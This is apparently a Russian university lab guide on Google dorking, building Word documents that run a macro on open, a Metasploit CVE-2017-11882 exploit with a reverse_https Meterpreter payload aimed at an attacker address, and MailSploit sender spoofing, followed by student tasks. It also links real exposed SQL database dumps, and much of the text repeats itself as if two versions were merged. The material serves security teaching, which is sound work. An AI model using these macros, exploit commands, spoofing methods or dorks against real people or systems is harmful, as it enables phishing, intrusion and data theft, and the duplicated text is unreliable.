Поиск только в тексте документа игнорируя адреса, хедеры, титлы и т.д.
Запрос:
```sh
intext:NS о матче Team Spirit
intext:"Кафедра занимает лидирующее место в области подготовки специалистов по теории управления, методам обработки данных и информационным технологиям, за время своего существования было подготовлено более 5000 инженеров, 300 кандидатов наук и 20 докторов наук."
```
Результат: https://bhf.su/threads/84305/
"Привет! сегодня мы поговорим, о игре под названием dota 2!"
Результат:
http://uit.mpei.ru/
"Кафедра управления и интеллектуальных технологий была создана в 1935 году. Кафедра занимает лидирующее место ..."
**FILETYPE**: или **EXT**:
FILETYPE: или EXT:
Поиск по расширению файла. Можно искать фотки, архивы, текстовые файлы, логи, базы данных и прочее.
Пример: filetype:sql
Результат: http://www.victoriahelm.com/miburnsc_wrd2.sql (Да, да прям переходим и скачиваем дамп в формате .sql)
INTITLE:
Поиск по сайтам между тегами <title>Найдем этот текст</title>
CACHE:
Пример:
```sh
filetype:sql
```
Результат:
http://208.86.225.239/flitetech_4_2017.sql
(Дамп в формате `.sql`)
**INTITLE**:
Поиск по сайтам между тегами `<title>`Найдем этот текст`</title>`
**CACHE**:
Находит копию страницы даже если эта страница уже недоступна по адресу в Интернете или изменила свое содержание. Иными словами, эта команда проводит поиск в кэше Google.
INFO:
**INFO**:
Покажет страницу, содержащую ссылки на варианты поиска: поиск по похожим страницам, обратные ссылки, и страницы, содержащие такую же ссылку. Эта команда означает то же самое, что и вписать в строку поиска данный адрес веб-страницы.
LINK:
**LINK**:
Возвращает список страниц, которые ссылаются на заданный сайт.
RELATED:
**RELATED**:
Поиск страниц похожих на эту.
- (минус)
Это знак исключения, то есть не искать или без этого текста. Обычно исключается -google -dev -git это девелоперские сайты.
" "(кавычки)
Искать точную фразу.
Примеры использования. Попробуйте выполнить их и просмотреть результаты поиска:
**Дополнительно**:
"-" (минус) - это знак исключения, то есть не искать или без этого текста. Обычно исключается -google -dev -git это девелоперские сайты.
" " (кавычки) - это искать точную фразу.
#### Примеры использования
Попробуйте выполнить их и просмотреть результаты поиска:
***В отчёте описать параметры запроса**
***После каждго запроса выполнить скриншот искомых данных (не ссылки в поисковом запросе Google)**
Для поиска дорков можно использовать специально созданную для этого базу – Google Hacking Database (GHDB - https://www.exploit-db.com/google-hacking-database/). Подробная статья, описывающая работу с данной базой - https://habrahabr.ru/post/283210/
2.2. Подготовка атаки
### 2.2. Подготовка атаки
После поиска необходимой информации следует фаза подготовки атаки на пользователя. Очень часто это письмо, отправленное на почтовый ящик жертвы со звучным названием и содержанием («Приказ на исполнение», «Погашение задолженности», «Новый штраф ГИБДД» и т.д.) и безобидным вложением в виде документа (word, excel, rtf и т.д.) либо ссылкой на вредоносный сайт, содержащий уязвимость или фишинговую страницу.
В данной лабораторной работе рассмотрим вариант создания документа Word, при открытии которого будет выполнен определенный код.
1. Откройте Microsoft Office Word
2. Нажмите комбинацию клавиш alt + F11, откроется окно редактирования макросов на языке Visual Basic
<imagesrc="assets/L4_1.jpg">
3. Нажмите два раза на документ (“ThisDocument”) в области “Project”.
4. Выполните команду в командной строке:
where calc.exe
Скопируйте полный путь к файлу
5. Для выполнения кода при открытии документа необходимо объявить функцию Private Sub Document_Open():
`where calc.exe` и скопируйте полный путь к файлу
5. Для выполнения кода при открытии документа необходимо объявить функцию Private Sub Document_Open() (в параметрах команды Shell необходимо передать путь к исполняемому файлу из предыдущего пункта:
```sh
Private Sub Document_Open()
RetVal = Shell("C:\Windows\System32\calc.exe", 1)
End Sub
В параметрах команды Shell необходимо передать путь к исполняемому файлу (получен в пункте 4.)
```
6. Сохраните файл в формате docm
Теперь откройте созданный файл. При разрешающих политиках выполнения макросов, должен запуститься калькулятор.
В данном примере была выполнена безобидная операция запуска калькулятора. Обычно это намного более сложная последовательность выполнения команд, в том числе загрузка исполняемого файла с серверов злоумышленников и последующий его запуск.
Это самый простой способ и защита от него – установка флага безопасности макросов в настройках приложений (возможно задать специальными политиками).
Более сложный способ – это использование одной из огромного количества уязвимостей в Microsoft Office. Пример использования такой уязвимости (CVE-2017-11882). Выполнять это не нужно, т.к. необходимого программного обеспечения на компьютерах лаборатории не установлено.
Эта ошибка была изначально замечена в октябре 2016 года. Все необходимое включено в Metasploit Framework. Metasploit помогает создать вредоносный файл RTF, который при открытии в уязвимых версиях Microsoft Word приведет к выполнению кода. Уязвимость состоит в том, когда объект OLE может сделать запрос http(s) и выполнить hta-код в ответ.
OLE— технология связывания и внедрения объектов в другие документы и объекты, разработанная корпорацией Майкрософт.
OLE позволяет передавать часть работы от одной программы редактирования к другой и возвращать результаты назад. Установленная на персональном компьютере издательская система может послать текст на обработку в текстовый редактор, либо изображение в редактор изображений с помощью OLE-технологии.
Основное преимущество OLE —она позволяет создать главный файл, картотеку функций, к которой обращается программа. Этот файл может оперировать данными из исходной программы, которые после обработки возвращаются в исходный документ.
Пример использования (выполняется в Metasploit Framework):
Это самый простой способ и защита от него – установка флага безопасности макросов в настройках приложений (возможно задать специальными политиками).
Более сложный способ – это использование одной из огромного количества уязвимостей в Microsoft Office. Пример использования такой уязвимости (CVE-2017-11882).
Просмотрим информацию о модуле
Задаём путь, куда metasploit сгенерирует нам файл с нагрузкой
set FILENAME /root/exp.rtf
Эта ошибка была изначально замечена в октябре 2016 года. Все необходимое включено в Metasploit Framework. Metasploit помогает создать вредоносный файл RTF, который при открытии в уязвимых версиях Microsoft Word приведет к выполнению кода. Уязвимость состоит в том, когда объект OLE может сделать запрос http(s) и выполнить hta-код в ответ.
Добавляем пейлоад и запускаем
set payload windows/meterpreter/reverse_https
set lhost 192.168.0.100 (адрес атакующего)
set lport 4443 (как обычно, можете выбирать почти любой)
exploit
**OLE** — технология связывания и внедрения объектов в другие документы и объекты, разработанная корпорацией Майкрософт.
На выходе получаем готовый файл, отправляем жертве (себе на виртуалку, т.к. используем в образовательных целях).
После запуска файла на системе, мы получим полный доступ в виде командной строки (powershell).
OLE позволяет передавать часть работы от одной программы редактирования к другой и возвращать результаты назад. Установленная на персональном компьютере издательская система может послать текст на обработку в текстовый редактор, либо изображение в редактор изображений с помощью OLE-технологии.
Основное преимущество OLE —она позволяет создать главный файл, картотеку функций, к которой обращается программа. Этот файл может оперировать данными из исходной программы, которые после обработки возвращаются в исходный документ.
2.4. Атака
### 2.3. Атака
Для совершения атаки создаётся почтовый ящик, максимально похожий на ящик отправителя. Или, к примеру, имитирующий реально существующий адрес.
Как вариант возможно использовать уязвимости подмены адреса (названной MailSploit), информация о которой была опубликована 5 декабря 2017 года. В результате исполнения этой уязвимости возможно полностью подменить адрес отправителя.
Как вариант возможно использовать уязвимости подмены адреса (названной *MailSploit*), информация о которой была опубликована 5 декабря 2017 года. В результате исполнения этой уязвимости возможно полностью подменить адрес отправителя.
В сердце MailSploit лежит проблема, связанная с тем, как почтовые серверы интерпретируют email-адреса, закодированные с помощью RFC-1342. Данный стандарт был принят еще в 1992 году, он позволяет использовать отличные от ASCII символы в хедерах. Дело в том, что по правилам содержимое хедера должно состоять только из символов ASCII. В итоге авторы почтовых стандартов используют RFC-1342 для автоматической конвертации не-ASCII символов в стандартный формат ASCII, чтобы избежать возникновения ошибок, когда письмо, тема или адрес которого содержат не-ASCII символы, проходит через сервер.
Большинство почтовых клиентов перекодируют RFC-1342 в привычный формат, но после не проверяют полученный результат на предмет вредоносности. Более того, если строка RFC-1342 содержит нулевой байт (null-byte) и более одного email-адреса, почтовый клиент распознает лишь адреса до нулевого байта, а все остальное останется «невидимым». Фактически, используя RFC-1342, атакующий может скрыть настоящий адрес письма, создав подделку, которую будет очень тяжело обнаружить. К примеру,
<imagesrc="assets/L4_3.jpg">
превратится в почтовом клиенте в:
<imagesrc="assets/L4_4.jpg">
При этом красным цветом выделен настоящий домен, которого почтовый клиент «не видит». Клиент распознает только первый адрес, potus@whitehouse.gov, тогда как @mailsploit.com, располагается уже после нулевого байта (\0). Хуже того, таким же образом в поле «From:» можно спрятать вредоносный код, который в ряде случаев будет выполнен после расшифровки почтовым клиентом.
Как оказалось, перед проблемой уязвимы 33 почтовых клиента, включая Apple Mail (macOS, iOSи watchOS), Mozilla Thunderbird, ряд клиентов Microsoft, Yahoo Mail, ProtonMail и так далее. При этом лишь 8 из 33 в настоящее время выпустили патчи, еще 12 производителей вообще никак не отреагировали на сообщения специалиста.
Таким образом жертва может получить вредоносный файл или ссылку в письме с абсолютно легитимным отправителем. Открыть данный файл и получить очень серьёзные проблемы.
3. Что интернет знает о нас?
### 3. Что интернет знает о нас?
Все мы пользуемся сервисами google (поиском, youtube, картами, мобильными устройствами на базе Android и прочими сервисами). Так или иначе, но у Google остается огромное количество информации о наших действиях, которую они хранят. Как и кто пользуется этой информацией – хороший вопрос, который стоит задать себе. А что же знает о нас Google? Если у вас есть аккаунт в Google – можно легко проверить, какие данные о нас он знает, для этого достаточно залогиниться в свой аккаунт и перейти по ссылке - www.google.com/takeout . После перехода можно попробовать создать архив и посмотреть, какие данные хранятся в гугле (или какие данные нам предоставляют для выгрузки).
Другой пример – Facebook, а вернее группа компаний, так как ему принадлежит и Instagram и WhatsUp и много других сервисов. Для того, чтобы понять, какую информацию о нас собирает Facebook – можно зайти в разрешения, которые запрашивает приложение на вашем смартфоне. Их окажется достаточно много. Зачем Facebook столько данных о вас? И агрегирование этих данных с других приложений компании.
Далее немного об утечках – каждый день в мире кто-то ворует персональные данные пользователей с различных сайтов. Через уязвимости, через социальную инженерию, через инсайдеров в компаниях, много способов. Часто эти данные попадают в публичный доступ. К примеру, в телеграм-каналы:
https://t.me/dataleak – публикует новости об утечках данных
https://t.me/gitleaks - публикуют утечки корпоративных данных из github
И другие, которые собирают утечки с различных ресурсов. Что если вы используете один и тот же пароль на нескольких сайтах и этот пароль окажется в одной из таких выборок?
4. Задание
1) Через google dorks найти сайты с доменом .com где присутствует в адресе слово hack и с содержимым страницы где присутствует слово exploit.
2) Через google dorks найти сайты, которые используют панель управления phpmyadmin
3) Через google dorks найти страницу своего профиля в социальной сети
4) Создать документ Microsoft Office, который при открытии запускает командную строку (cmd.exe).
### 4. Задание
***Результаты должны быть уникальные**
1. Через google dorks найти сайты с доменом .com где присутствует в адресе слово hack и с содержимым страницы где присутствует слово exploit.
2. Через google dorks найти сайты, которые используют панель управления phpmyadmin
3. Через google dorks найти страницу своего профиля в социальной сети
4. Создать документ Microsoft Office, который при открытии запускает командную строку (cmd.exe) и выполняет перезагрузку компьютера.
